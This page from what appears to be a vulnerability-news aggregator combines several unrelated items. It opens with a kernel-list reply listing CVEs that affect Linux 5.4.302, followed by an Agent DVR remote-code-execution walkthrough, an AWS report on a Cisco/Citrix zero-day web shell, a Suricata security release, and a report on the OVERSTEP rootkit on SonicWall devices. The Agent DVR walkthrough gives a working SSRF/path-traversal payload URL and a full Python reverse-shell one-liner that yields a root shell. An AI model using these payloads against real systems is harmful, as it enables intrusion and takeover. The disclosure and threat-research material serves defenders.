    5.4.302 is vulnerable to CVE-2024-57887
    5.4.302 is vulnerable to CVE-2024-57888
    5.4.302 is vulnerable to CVE-2024-57893
    5.4.302 is vulnerable to CVE-2024-57896
    5.4.302 is vulnerable to CVE-2024-57897
    5.4.302 is vulnerable to CVE-2024-57898
    5.4.302 is vulnerable to CVE-2024-57899
    5.4.302 is vulnerable to CVE-2024-57903
    5.4.302 is vulnerable to CVE-2024-57924
    5.4.302 is vulnerable to CVE-2024-57939
    5.4.302 is vulnerable to CVE-2024-57974
    5.4.302 is vulnerable to CVE-2024-57975
    5.4.302 is vulnerable to CVE-2024-57976
    5.4.302 is vulnerable to CVE-2024-57982
    5.4.302 is vulnerable to CVE-2024-57984
    5.4.302 is vulnerable to CVE-2024-58005
    5.4.302 is vulnerable to CVE-2024-58016
    5.4.302 is vulnerable to CVE-2024-58034
    5.4.302 is vulnerable to CVE-2024-58053
    5.4.302 is vulnerable to CVE-2024-58089
    5.4.302 is vulnerable to CVE-2024-58093
    5.4.302 is vulnerable to CVE-2024-58094
    5.4.302 is vulnerable to CVE-2024-58095
    5.4.302 is vulnerable to CVE-2024-58240
    5.4.302 is vulnerable to CVE-2024-58241
    5.4.302 is vulnerable to CVE-2025-21629
    5.4.302 is vulnerable to CVE-2025-21634
    5.4.302 is vulnerable to CVE-2025-21635
    5.4.302 is vulnerable to CVE-2025-21648
    5.4.302 is vulnerable to CVE-2025-21651
    5.4.302 is vulnerable to CVE-2025-21682
    5.4.302 is vulnerable to CVE-2025-21690
    5.4.302 is vulnerable to CVE-2025-21711
    5.4.302 is vulnerable to CVE-2025-21712
    5.4.302 is vulnerable to CVE-2025-21726
    5.4.302 is vulnerable to CVE-2025-21727
    5.4.302 is vulnerable to CVE-2025-21734
    5.4.302 is vulnerable to CVE-2025-21738
    5.4.302 is vulnerable to CVE-2025-21750
    5.4.302 is vulnerable to CVE-2025-21758
    5.4.302 is vulnerable to CVE-2025-21759
    5.4.302 is vulnerable to CVE-2025-21766
    5.4.302 is vulnerable to CVE-2025-21768
    5.4.302 is vulnerable to CVE-2025-21779
    5.4.302 is vulnerable to CVE-2025-21780
    5.4.302 is vulnerable to CVE-2025-21792
    5.4.302 is vulnerable to CVE-2025-21796
    5.4.302 is vulnerable to CVE-2025-21801
    5.4.302 is vulnerable to CVE-2025-21802
    5.4.302 is vulnerable to CVE-2025-21812
    5.4.302 is vulnerable to CVE-2025-21816
    5.4.302 is vulnerable to CVE-2025-21820
    5.4.302 is vulnerable to CVE-2025-21821
    5.4.302 is vulnerable to CVE-2025-21831
    5.4.302 is vulnerable to CVE-2025-21838
    5.4.302 is vulnerable to CVE-2025-21855
    5.4.302 is vulnerable to CVE-2025-21881
    5.4.302 is vulnerable to CVE-2025-21891
    5.4.302 is vulnerable to CVE-2025-21894
    5.4.302 is vulnerable to CVE-2025-21899
    5.4.302 is vulnerable to CVE-2025-21912
    5.4.302 is vulnerable to CVE-2025-21927
    5.4.302 is vulnerable to CVE-2025-21931
    5.4.302 is vulnerable to CVE-2025-21941
    5.4.302 is vulnerable to CVE-2025-21969
    5.4.302 is vulnerable to CVE-2025-21976
    5.4.302 is vulnerable to CVE-2025-21985
    5.4.302 is vulnerable to CVE-2025-22008
    5.4.302 is vulnerable to CVE-2025-22010
    5.4.302 is vulnerable to CVE-2025-22022
    5.4.302 is vulnerable to CVE-2025-22025
    5.4.302 is vulnerable to CVE-2025-22026
    5.4.302 is vulnerable to CVE-2025-22027
    5.4.302 is vulnerable to CVE-2025-22028
    5.4.302 is vulnerable to CVE-2025-22053
    5.4.302 is vulnerable to CVE-2025-22055
    5.4.302 is vulnerable to CVE-2025-22057
    5.4.302 is vulnerable to CVE-2025-22060
    5.4.302 is vulnerable to CVE-2025-22072
    5.4.302 is vulnerable to CVE-2025-22083
    5.4.302 is vulnerable to CVE-2025-22090
    5.4.302 is vulnerable to CVE-2025-22103
    5.4.302 is vulnerable to CVE-2025-22104
    5.4.302 is vulnerable to CVE-2025-22107
    5.4.302 is vulnerable to CVE-2025-22109
    5.4.302 is vulnerable to CVE-2025-22121
    5.4.302 is vulnerable to CVE-2025-22125
    5.4.302 is vulnerable to CVE-2025-23131
    5.4.302 is vulnerable to CVE-2025-23132
    5.4.302 is vulnerable to CVE-2025-23141
    5.4.302 is vulnerable to CVE-2025-23148
    5.4.302 is vulnerable to CVE-2025-23156
    5.4.302 is vulnerable to CVE-2025-23161
    5.4.302 is vulnerable to CVE-2025-37739
    5.4.302 is vulnerable to CVE-2025-37742
    5.4.302 is vulnerable to CVE-2025-37745
    5.4.302 is vulnerable to CVE-2025-37756
    5.4.302 is vulnerable to CVE-2025-37768
    5.4.302 is vulnerable to CVE-2025-37770
    5.4.302 is vulnerable to CVE-2025-37800
    5.4.302 is vulnerable to CVE-2025-37801
    5.4.302 is vulnerable to CVE-2025-37807
    5.4.302 is vulnerable to CVE-2025-37830
    5.4.302 is vulnerable to CVE-2025-37833
    5.4.302 is vulnerable to CVE-2025-37834
    5.4.302 is vulnerable to CVE-2025-37836
    5.4.302 is vulnerable to CVE-2025-37842
    5.4.302 is vulnerable to CVE-2025-37849
    5.4.302 is vulnerable to CVE-2025-37852
    5.4.302 is vulnerable to CVE-2025-37853
    5.4.302 is vulnerable to CVE-2025-37856
    5.4.302 is vulnerable to CVE-2025-37867
    5.4.302 is vulnerable to CVE-2025-37877
    5.4.302 is vulnerable to CVE-2025-37878
    5.4.302 is vulnerable to CVE-2025-37879
    5.4.302 is vulnerable to CVE-2025-37880
    5.4.302 is vulnerable to CVE-2025-37882
    5.4.302 is vulnerable to CVE-2025-37883
    5.4.302 is vulnerable to CVE-2025-37884
    5.4.302 is vulnerable to CVE-2025-37885
    5.4.302 is vulnerable to CVE-2025-37911
    5.4.302 is vulnerable to CVE-2025-37920
    5.4.302 is vulnerable to CVE-2025-37925
    5.4.302 is vulnerable to CVE-2025-37928
    5.4.302 is vulnerable to CVE-2025-37942
    5.4.302 is vulnerable to CVE-2025-37948
    5.4.302 is vulnerable to CVE-2025-37951
    5.4.302 is vulnerable to CVE-2025-37954
    5.4.302 is vulnerable to CVE-2025-37961
    5.4.302 is vulnerable to CVE-2025-37963
    5.4.302 is vulnerable to CVE-2025-37967
    5.4.302 is vulnerable to CVE-2025-37980
    5.4.302 is vulnerable to CVE-2025-37992
    5.4.302 is vulnerable to CVE-2025-38009
    5.4.302 is vulnerable to CVE-2025-38022
    5.4.302 is vulnerable to CVE-2025-38039
    5.4.302 is vulnerable to CVE-2025-38040
    5.4.302 is vulnerable to CVE-2025-38041
    5.4.302 is vulnerable to CVE-2025-38045
    5.4.302 is vulnerable to CVE-2025-38048
    5.4.302 is vulnerable to CVE-2025-38062
    5.4.302 is vulnerable to CVE-2025-38063
    5.4.302 is vulnerable to CVE-2025-38064
    5.4.302 is vulnerable to CVE-2025-38067
    5.4.302 is vulnerable to CVE-2025-38068
    5.4.302 is vulnerable to CVE-2025-38069
    5.4.302 is vulnerable to CVE-2025-38071
    5.4.302 is vulnerable to CVE-2025-38073
    5.4.302 is vulnerable to CVE-2025-38074
    5.4.302 is vulnerable to CVE-2025-38080
    5.4.302 is vulnerable to CVE-2025-38084
    5.4.302 is vulnerable to CVE-2025-38085
    5.4.302 is vulnerable to CVE-2025-38094
    5.4.302 is vulnerable to CVE-2025-38095
    5.4.302 is vulnerable to CVE-2025-38096
    5.4.302 is vulnerable to CVE-2025-38099
    5.4.302 is vulnerable to CVE-2025-38105
    5.4.302 is vulnerable to CVE-2025-38107
    5.4.302 is vulnerable to CVE-2025-38112
    5.4.302 is vulnerable to CVE-2025-38117
    5.4.302 is vulnerable to CVE-2025-38119
    5.4.302 is vulnerable to CVE-2025-38126
    5.4.302 is vulnerable to CVE-2025-38129
    5.4.302 is vulnerable to CVE-2025-38143
    5.4.302 is vulnerable to CVE-2025-38159
    5.4.302 is vulnerable to CVE-2025-38161
    5.4.302 is vulnerable to CVE-2025-38166
    5.4.302 is vulnerable to CVE-2025-38189
    5.4.302 is vulnerable to CVE-2025-38192
    5.4.302 is vulnerable to CVE-2025-38198
    5.4.302 is vulnerable to CVE-2025-38207
    5.4.302 is vulnerable to CVE-2025-38208
    5.4.302 is vulnerable to CVE-2025-38215
    5.4.302 is vulnerable to CVE-2025-38218
    5.4.302 is vulnerable to CVE-2025-38232
    5.4.302 is vulnerable to CVE-2025-38234
    5.4.302 is vulnerable to CVE-2025-38250
    5.4.302 is vulnerable to CVE-2025-38257
    5.4.302 is vulnerable to CVE-2025-38259
    5.4.302 is vulnerable to CVE-2025-38261
    5.4.302 is vulnerable to CVE-2025-38263
    5.4.302 is vulnerable to CVE-2025-38264
    5.4.302 is vulnerable to CVE-2025-38269
    5.4.302 is vulnerable to CVE-2025-38272
    5.4.302 is vulnerable to CVE-2025-38280
    5.4.302 is vulnerable to CVE-2025-38310
    5.4.302 is vulnerable to CVE-2025-38319
    5.4.302 is vulnerable to CVE-2025-38321
    5.4.302 is vulnerable to CVE-2025-38331
    5.4.302 is vulnerable to CVE-2025-38333
    5.4.302 is vulnerable to CVE-2025-38342
    5.4.302 is vulnerable to CVE-2025-38359
    5.4.302 is vulnerable to CVE-2025-38361
    5.4.302 is vulnerable to CVE-2025-38363
    5.4.302 is vulnerable to CVE-2025-38384
    5.4.302 is vulnerable to CVE-2025-38409
    5.4.302 is vulnerable to CVE-2025-38410
    5.4.302 is vulnerable to CVE-2025-38422
    5.4.302 is vulnerable to CVE-2025-38425
    5.4.302 is vulnerable to CVE-2025-38426
    5.4.302 is vulnerable to CVE-2025-38436
    5.4.302 is vulnerable to CVE-2025-38438
    5.4.302 is vulnerable to CVE-2025-38449
    5.4.302 is vulnerable to CVE-2025-38499
    5.4.302 is vulnerable to CVE-2025-38503
    5.4.302 is vulnerable to CVE-2025-38512
    5.4.302 is vulnerable to CVE-2025-38524
    5.4.302 is vulnerable to CVE-2025-38527
    5.4.302 is vulnerable to CVE-2025-38531
    5.4.302 is vulnerable to CVE-2025-38544
    5.4.302 is vulnerable to CVE-2025-38556
    5.4.302 is vulnerable to CVE-2025-38560
    5.4.302 is vulnerable to CVE-2025-38576
    5.4.302 is vulnerable to CVE-2025-38584
    5.4.302 is vulnerable to CVE-2025-38591
    5.4.302 is vulnerable to CVE-2025-38595
    5.4.302 is vulnerable to CVE-2025-38614
    5.4.302 is vulnerable to CVE-2025-38623
    5.4.302 is vulnerable to CVE-2025-38624
    5.4.302 is vulnerable to CVE-2025-38626
    5.4.302 is vulnerable to CVE-2025-38643
    5.4.302 is vulnerable to CVE-2025-38644
    5.4.302 is vulnerable to CVE-2025-38645
    5.4.302 is vulnerable to CVE-2025-38656
    5.4.302 is vulnerable to CVE-2025-38665
    5.4.302 is vulnerable to CVE-2025-38676
    5.4.302 is vulnerable to CVE-2025-38679
    5.4.302 is vulnerable to CVE-2025-38683
    5.4.302 is vulnerable to CVE-2025-38684
    5.4.302 is vulnerable to CVE-2025-38685
    5.4.302 is vulnerable to CVE-2025-38702
    5.4.302 is vulnerable to CVE-2025-38704
    5.4.302 is vulnerable to CVE-2025-38705
    5.4.302 is vulnerable to CVE-2025-38706
    5.4.302 is vulnerable to CVE-2025-38709
    5.4.302 is vulnerable to CVE-2025-38710
    5.4.302 is vulnerable to CVE-2025-38716
    5.4.302 is vulnerable to CVE-2025-38717
    5.4.302 is vulnerable to CVE-2025-38728
    5.4.302 is vulnerable to CVE-2025-38734
    5.4.302 is vulnerable to CVE-2025-39677
    5.4.302 is vulnerable to CVE-2025-39683
    5.4.302 is vulnerable to CVE-2025-39684
    5.4.302 is vulnerable to CVE-2025-39685
    5.4.302 is vulnerable to CVE-2025-39686
    5.4.302 is vulnerable to CVE-2025-39693
    5.4.302 is vulnerable to CVE-2025-39697
    5.4.302 is vulnerable to CVE-2025-39702
    5.4.302 is vulnerable to CVE-2025-39705
    5.4.302 is vulnerable to CVE-2025-39706
    5.4.302 is vulnerable to CVE-2025-39707
    5.4.302 is vulnerable to CVE-2025-39715
    5.4.302 is vulnerable to CVE-2025-39716
    5.4.302 is vulnerable to CVE-2025-39726
    5.4.302 is vulnerable to CVE-2025-39738
    5.4.302 is vulnerable to CVE-2025-39744
    5.4.302 is vulnerable to CVE-2025-39745
    5.4.302 is vulnerable to CVE-2025-39746
    5.4.302 is vulnerable to CVE-2025-39747
    5.4.302 is vulnerable to CVE-2025-39748
    5.4.302 is vulnerable to CVE-2025-39753
    5.4.302 is vulnerable to CVE-2025-39754
    5.4.302 is vulnerable to CVE-2025-39759
    5.4.302 is vulnerable to CVE-2025-39760
    5.4.302 is vulnerable to CVE-2025-39762
    5.4.302 is vulnerable to CVE-2025-39763
    5.4.302 is vulnerable to CVE-2025-39764
    5.4.302 is vulnerable to CVE-2025-39770
    5.4.302 is vulnerable to CVE-2025-39772
    5.4.302 is vulnerable to CVE-2025-39773
    5.4.302 is vulnerable to CVE-2025-39781
    5.4.302 is vulnerable to CVE-2025-39789
    5.4.302 is vulnerable to CVE-2025-39795
    5.4.302 is vulnerable to CVE-2025-39797
    5.4.302 is vulnerable to CVE-2025-39800
    5.4.302 is vulnerable to CVE-2025-39801
    5.4.302 is vulnerable to CVE-2025-39810
    5.4.302 is vulnerable to CVE-2025-39819
    5.4.302 is vulnerable to CVE-2025-39825
    5.4.302 is vulnerable to CVE-2025-39826
    5.4.302 is vulnerable to CVE-2025-39827
    5.4.302 is vulnerable to CVE-2025-39829
    5.4.302 is vulnerable to CVE-2025-39833
    5.4.302 is vulnerable to CVE-2025-39838
    5.4.302 is vulnerable to CVE-2025-39863
    5.4.302 is vulnerable to CVE-2025-39865
    5.4.302 is vulnerable to CVE-2025-39866
    5.4.302 is vulnerable to CVE-2025-39873
    5.4.302 is vulnerable to CVE-2025-39901
    5.4.302 is vulnerable to CVE-2025-39905
    5.4.302 is vulnerable to CVE-2025-39925
    5.4.302 is vulnerable to CVE-2025-39927
    5.4.302 is vulnerable to CVE-2025-39929
    5.4.302 is vulnerable to CVE-2025-39931
    5.4.302 is vulnerable to CVE-2025-39932
    5.4.302 is vulnerable to CVE-2025-39933
    5.4.302 is vulnerable to CVE-2025-39940
    5.4.302 is vulnerable to CVE-2025-39949
    5.4.302 is vulnerable to CVE-2025-39952
    5.4.302 is vulnerable to CVE-2025-39957
    5.4.302 is vulnerable to CVE-2025-39958
    5.4.302 is vulnerable to CVE-2025-39961
    5.4.302 is vulnerable to CVE-2025-39964
    5.4.302 is vulnerable to CVE-2025-39990
    5.4.302 is vulnerable to CVE-2025-40003
    5.4.302 is vulnerable to CVE-2025-40005
    5.4.302 is vulnerable to CVE-2025-40021
    5.4.302 is vulnerable to CVE-2025-40025
    5.4.302 is vulnerable to CVE-2025-40036
    5.4.302 is vulnerable to CVE-2025-40043
    5.4.302 is vulnerable to CVE-2025-40053
    5.4.302 is vulnerable to CVE-2025-40064
    5.4.302 is vulnerable to CVE-2025-40074
    5.4.302 is vulnerable to CVE-2025-40075
    5.4.302 is vulnerable to CVE-2025-40080
    5.4.302 is vulnerable to CVE-2025-40082
    5.4.302 is vulnerable to CVE-2025-40092
    5.4.302 is vulnerable to CVE-2025-40093
    5.4.302 is vulnerable to CVE-2025-40094
    5.4.302 is vulnerable to CVE-2025-40095
    5.4.302 is vulnerable to CVE-2025-40099
    5.4.302 is vulnerable to CVE-2025-40100
    5.4.302 is vulnerable to CVE-2025-40102
    5.4.302 is vulnerable to CVE-2025-40103
    5.4.302 is vulnerable to CVE-2025-40104
    5.4.302 is vulnerable to CVE-2025-40107
    5.4.302 is vulnerable to CVE-2025-40110
    5.4.302 is vulnerable to CVE-2025-40123
    5.4.302 is vulnerable to CVE-2025-40135
    5.4.302 is vulnerable to CVE-2025-40137
    5.4.302 is vulnerable to CVE-2025-40139
    5.4.302 is vulnerable to CVE-2025-40146
    5.4.302 is vulnerable to CVE-2025-40149
    5.4.302 is vulnerable to CVE-2025-40158
    5.4.302 is vulnerable to CVE-2025-40160
    5.4.302 is vulnerable to CVE-2025-40164
    5.4.302 is vulnerable to CVE-2025-40168
    5.4.302 is vulnerable to CVE-2025-40170
    5.4.302 is vulnerable to CVE-2025-40180
    5.4.302 is vulnerable to CVE-2025-40193
    5.4.302 is vulnerable to CVE-2025-40195
    5.4.302 is vulnerable to CVE-2025-40196
    5.4.302 is vulnerable to CVE-2025-40206
    5.4.302 is vulnerable to CVE-2025-40210
    5.4.302 is vulnerable to CVE-2025-40300

    Total Vulnerable CVE's in 5.4.302 : 1539

     prev parent reply  other threads:[~2025-12-03 12:50 UTC|newest]

Thread overview: 3+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2025-12-03 12:12 Linux 5.4.302 Greg Kroah-Hartman
2025-12-03 12:12 ` Greg Kroah-Hartman
2025-12-03 12:50 ` Greg Kroah-Hartman [this message]

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=2025120358-skating-outage-7c61@gregkh \
    --to=gregkh@linuxfoundation.org \
    --cc=akpm@linux-foundation.org \
    --cc=jslaby@suse.cz \
    --cc=linux-kernel@vger.kernel.org \
    --cc=lwn@lwn.net \
    --cc=stable@vger.kernel.org \
    --cc=torvalds@linux-foundation.org \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link

Be sure your reply has a Subject: header at the top and a blank line before the message body.

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.

RCE in Agent DVR

2025-11-18T15:39:57 by Alexandre Dulaunoy

JSON

Description:

Ref: https://www.ericholub.com/blog/agent-dvr-rce/

Agent DVR is surveillance recording software from iSpyConnect. Versions ≤ 6.6.7.0 are vulnerable to local path traversal, SSRF, and command injection (on Linux), which when combined lead to authenticated RCE. These findings have all been combined into CVE-2025-63408.

Walkthrough:

Agent DVR has a local API where you can access things like recordings without any kind of authentication. Here’s the API docs for it:

[

Swagger UI

https://ispysoftware.github.io/Agent_API/#/

](https://ispysoftware.github.io/Agent_API/#/)

One call in particular is interesting, which is ‘addrecording’. This lets you assign a ‘recording’ to a particular camera.

Turns out this call is vulnerable to path traversal. I’ve already written some exploit code on how to get any file from the filesystem from this:

https://github.com/eric-m-holub/double-agent

This vulnerability can be chained with SSRF and command injection vulnerabilities for full RCE. I’m going to be attacking Agent DVR v6.6.1.0 running on Ubuntu (Linux). I tested these vulns on Windows against the same Agent DVR version and found it was vulnerable to everything but the command injection.

First off, add a new Network IP Camera.

Next select the gear icon to update the Source Type:

Now enter in the following payload for ‘Live URL’:

💲

http://127.0.0.1:8090/command/addrecording?oid=1&ot=2&path=/etc/passwd&name=../../../../Commands/rce.sh

Press ‘OK’ and then flip the camera on and off:

This leverages an SSRF vulnerability which calls this local API and creates a file called ‘rce.sh’ in the ‘Commands’ directory of Agent DVR using directory traversal. It doesn’t matter what the file contents are, only the file extension type.

Now create a new Action and Task for this camera:

Now on the popup to create a task select “Execute Command” and select the created ‘rce’ file:

For the ‘Parameters’ input, this is where you put your system command. Yes, this parameter is vulnerable to command injection, but only when you target a bash script. I had trouble with bash reverse shells, but Python works OK. Here’s that payload:

`python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'`

At this point, I’d suggest updating your new camera to something with an ‘Image’ source so we can make a new recording from it:

You can put any Image URL you want in there

So now start a listener on the port you specified in your payload, and then create a new recording on this new camera and you should get a root shell:

Tah dah. Agent DVR runs as root by default on Linux, so no privilege escalation is necessary. Have a good day.

Related vulnerabilities: CVE-2025-63408

Amazon discovers APT exploiting Cisco and Citrix zero-days

2025-11-13T08:59:31 by Alexandre Dulaunoy

JSON

Amazon discovers APT exploiting Cisco and Citrix zero-days | AWS Security Blog

AWS Security Blog

The Amazon threat intelligence team has identified an advanced threat actor exploiting previously undisclosed zero-day vulnerabilities in Cisco Identity Service Engine (ISE) and Citrix systems. The campaign used custom malware and demonstrated access to multiple undisclosed vulnerabilities. This discovery highlights the trend of threat actors focusing on critical identity and network access control infrastructure—the systems enterprises rely on to enforce security policies and manage authentication across their networks.

Initial discovery

Our Amazon MadPot honeypot service detected exploitation attempts for the Citrix Bleed Two vulnerability (CVE-2025-5777) prior to public disclosure, indicating a threat actor had been exploiting the vulnerability as a zero-day. Through further investigation of the same threat exploiting the Citrix vulnerability, Amazon Threat Intelligence identified and shared with Cisco an anomalous payload targeting a previously undocumented endpoint in Cisco ISE that used vulnerable deserialization logic. This vulnerability, now designated as CVE-2025-20337, allowed the threat actors to achieve pre-authentication remote code execution on Cisco ISE deployments, providing administrator-level access to compromised systems. What made this discovery particularly concerning was that exploitation was occurring in the wild before Cisco had assigned a CVE number or released comprehensive patches across all affected branches of Cisco ISE. This patch-gap exploitation technique is a hallmark of sophisticated threat actors who closely monitor security updates and quickly weaponize vulnerabilities.

Custom web shell deployment

Following successful exploitation, the threat actor deployed a custom web shell disguised as a legitimate Cisco ISE component named IdentityAuditAction. This wasn’t typical off-the-shelf malware, but rather a custom-built backdoor specifically designed for Cisco ISE environments. The web shell demonstrated advanced evasion capabilities. It operated completely in-memory, leaving minimal forensic artifacts, used Java reflection to inject itself into running threads, registered as a listener to monitor all HTTP requests across the Tomcat server, implemented DES encryption with non-standard Base64 encoding to evade detection, and required knowledge of specific HTTP headers to access.

The following is a snippet of the deserialization routine showing the actor’s extensive authentication to access their web shell:

Security implications

As previously noted, Amazon Threat Intelligence identified through our MadPot honeypots that the threat actor was exploiting both CVE-2025-20337 and CVE-2025-5777 as zero-days, and was indiscriminately targeting the internet with these vulnerabilities at the time of investigation. The campaign underscored the evolving tactics of threat actors targeting critical enterprise infrastructure at the network edge. The threat actor’s custom tooling demonstrated a deep understanding of enterprise Java applications, Tomcat internals, and the specific architectural nuances of the Cisco Identity Service Engine. The access to multiple unpublished zero-day exploits indicates a highly resourced threat actor with advanced vulnerability research capabilities or potential access to non-public vulnerability information.

Recommendations for security teams

For security teams, this serves as a reminder that critical infrastructure components like identity management systems and remote access gateways remain prime targets for threat actors. The pre-authentication nature of these exploits reveals that even well-configured and meticulously maintained systems can be affected. This underscores the importance of implementing comprehensive defense-in-depth strategies and developing robust detection capabilities that can identify unusual behavior patterns. Amazon recommends limiting access, through firewalls or layered access, to privileged security appliance endpoints such as management portals.

Vendor references

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Related vulnerabilities: CVE-2025-5777 CVE-2025-20337 CVE-2025-5349

Suricata 8.0.2 and 7.0.13 released - including multiple vulnerabilities

2025-11-06T14:22:09 by Alexandre Dulaunoy

JSON

Suricata 8.0.2 and 7.0.13 released! - Suricata

We are pleased to announce the releases of Suricata 8.0.2 and 7.0.13.

These are security releases, fixing a number of important issues.

Get the releases here:

8.0.2: https://www.openinfosecfoundation.org/download/suricata-8.0.2.tar.gz

7.0.13: https://www.openinfosecfoundation.org/download/suricata-7.0.13.tar.gz

Notable Changes

Suricata-update has been updated to version 1.3.7. This version is bundled with the releases.

Various security, performance, accuracy, and stability issues have been fixed.

8.0.2 tickets: https://redmine.openinfosecfoundation.org/versions/225

7.0.13 tickets: https://redmine.openinfosecfoundation.org/versions/224

CVE IDs Addressed:

CVE-2025-64344: HIGH (7.0.x and 8.0.x)
CVE-2025-64333: HIGH (7.0.x and 8.0.x)
CVE-2025-64332: HIGH (7.0.x and 8.0.x)
CVE-2025-64331: HIGH (7.0.x and 8.0.x)
CVE-2025-64330: HIGH (7.0.x and 8.0.x)
CVE-2025-64335: HIGH (8.0.x only)
CVE-2025-64334: HIGH (8.0.x only)

Suricata Security Advisories: https://github.com/OISF/suricata/security/advisories

OISF Signing key updated

The OISF signing key has been recently updated to have a later expiration date. It is the same key as before, but users will need to refresh it:

gpg --receive-keys 2BA9C98CCDF1E93A

It can also be downloaded from:

https://www.openinfosecfoundation.org/downloads/OISF.pub

Special Thanks

Adam Kiripolsky, Alain Térieur, Amir Boussejra, Andreas Dolp, Andy Awad, Bai Liang, Cheng Longfei, Fupeng Zhao, Heng Li, Jamie Lavigne, Jesse Lepich, Jules Lumbergh, Marko Jahnke, Outreachy, OSS-Fuzz, Coverity.

Join us for SuriCon 2025!!

This year’s Suricata Community Conference is happening this month in Montreal, Canada, from November 19 to 21.

SuriCon is a great place to present exciting work or research done with Suricata. Come share it with us! Check the agenda, we always have great talks https://suricon.net/agenda-montreal/

This year, we have three 2-day training sessions to choose from, including a brand-new Threat Hunting class, and a Rule Writing training. Some rooms are getting full, don’t miss your spot! https://suricon.net/trainings/

Check everything SuriCon and get book room deals at https://suricon.net/ .

About Suricata

Suricata is a high-performance Network Threat Detection, IDS, IPS, and Network Security Monitoring engine. Open-source and owned by a community-run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by OISF, its supporting vendors, and the community.

———————————————

Originally posted by Victor Julien to the Suricata forum: https://forum.suricata.io/t/suricata-8-0-2-and-7-0-13-released

UNC6148 Backdoors Fully-Patched SonicWall SMA 100 Series Devices with OVERSTEP Rootkit

2025-11-05T08:42:51 by Alexandre Dulaunoy

JSON

UNC6148 Backdoors Fully-Patched SonicWall SMA 100 Series Devices with OVERSTEP Rootkit

A threat activity cluster has been observed targeting fully-patched end-of-life SonicWall Secure Mobile Access (SMA) 100 series appliances as part of a campaign designed to drop a backdoor called OVERSTEP.

The malicious activity, dating back to at least October 2024, has been attributed by the Google Threat Intelligence Group (GTIG) to a hacking crew it tracks as UNC6148. The number of known victims is "limited" at this stage.

The tech giant assessed with high confidence that the threat actor is "leveraging credentials and one-time password (OTP) seeds stolen during previous intrusions, allowing them to regain access even after organizations have applied security updates."

"Analysis of network traffic metadata records suggests that UNC6148 may have initially exfiltrated these credentials from the SMA appliance as early as January 2025."

The exact initial access vector used to deliver the malware is currently not known due to the steps taken by the threat actors to remove log entries. But it's believed that access may have been gained through the exploitation of known security flaws such as CVE-2021-20035, CVE-2021-20038, CVE-2021-20039, CVE-2024-38475, or CVE-2025-32819.

Alternately, the tech giant's threat intelligence team theorized that the administrator credentials could've been obtained through information-stealing logs or acquired from credential marketplaces. However, it said it didn't find any evidence to back up this hypothesis.

Upon gaining access, the threat actors have been found to establish an SSL-VPN session and spawn a reverse shell, although how this was achieved remains a mystery given that shell access should not be possible by design on these appliances. It's believed that it may have been pulled off by means of a zero-day flaw.

The reverse shell is used to run reconnaissance and file manipulation commands, not to mention export and import settings to the SMA appliance, suggesting that UNC6148 may have altered an exported settings file offline to include new rules so that their operations are not interrupted or blocked by the access gateways.

The attacks culminate in the deployment of a previously undocumented implant named OVERSTEP that's capable of modifying the appliance's boot process to maintain persistent access, as well as credential theft and concealing its own components to evade detection by patching various file system-related functions.

This is achieved by implementing a usermode rootkit through the hijacked standard library functions open and readdir, allowing it to hide the artifacts associated with the attack. The malware also hooks into the write API function to receive commands from an attacker-controlled server in the form of embedded within web requests -

dobackshell, which starts a reverse shell to the specified IP address and port
dopasswords, which creates a TAR archive of the files /tmp/temp.db, /etc/EasyAccess/var/conf/persist.db, and /etc/EasyAccess/var/cert, and save it in the location "/usr/src/EasyAccess/www/htdocs/" so that it can be downloaded via a web browser

"UNC6148 modified the legitimate RC file '/etc/rc.d/rc.fwboot' to achieve persistence for OVERSTEP," GTIG said. "The changes meant that whenever the appliance was rebooted, the OVERSTEP binary would be loaded into the running file system on the appliance."

Once the deployment step is complete, the threat actor then proceeds to clear the system logs and reboots the firewall to activate the execution of the C-based backdoor. The malware also attempts to remove the command execution traces from different log files, including httpd.log, http_request.log, and inotify.log.

"The actor's success in hiding their tracks is largely due to OVERSTEP's capability to selectively delete log entries [from the three log files]," Google said. "This anti-forensic measure, combined with a lack of shell history on disk, significantly reduces visibility into the actor's secondary objectives."

Google has evaluated with medium confidence that UNC6148 may have weaponized an unknown, zero-day remote code execution vulnerability to deploy OVERSTEP on targeted SonicWall SMA appliances. Furthermore, it's suspected that the operations are carried out with the intent to facilitate data theft and extortion operations, and even ransomware deployment.

This connection stems from the fact that one of the organizations that was targeted by UNC6148 was posted on the data leak site operated by World Leaks, an extortion gang run by individuals previously associated with the Hunters International ransomware scheme. It's worth noting that Hunters International recently shuttered its criminal enterprise.

According to Google, UNC6148 exhibits tactical overlaps with prior exploitation of SonicWall SMA devices observed in July 2023 that involved an unknown threat actor deploying a web shell, a hiding mechanism, and a way to ensure persistence across firmware upgrades, per Truesec.

The exploitation activity was subsequently linked by security researcher Stephan Berger to the deployment of the Abyss ransomware.

The findings once again highlight how threat actors are increasingly focusing on edge network systems that aren't usually covered by common security tools like Endpoint Detection and Response (EDR) or antivirus software and slip into target networks unnoticed.

"Organizations should acquire disk images for forensic analysis to avoid interference from the rootkit anti-forensic capabilities. Organizations may need to engage with SonicWall to capture disk images from physical appliances," Google said.

When reached for comment on the findings, SonicWall told The Hacker News that it has been "working closely" with GTIG throughout the whole process, and that it plans to accelerate the end-of-support date for the SMA 100 series. It also said it intends to support existing SMA 100 deployments with firmware updates throughout the remaining lifecycle.

"In response to the evolving threat landscape – and in alignment with our commitment to transparency and customer protection – SonicWall will accelerate the end-of-support date for the SMA 100 series," the company said. "The SMA 100 has already reached end-of-sale status, as reflected in our Product Lifecycle Table, and this update aligns with our long-term strategy and industry direction."

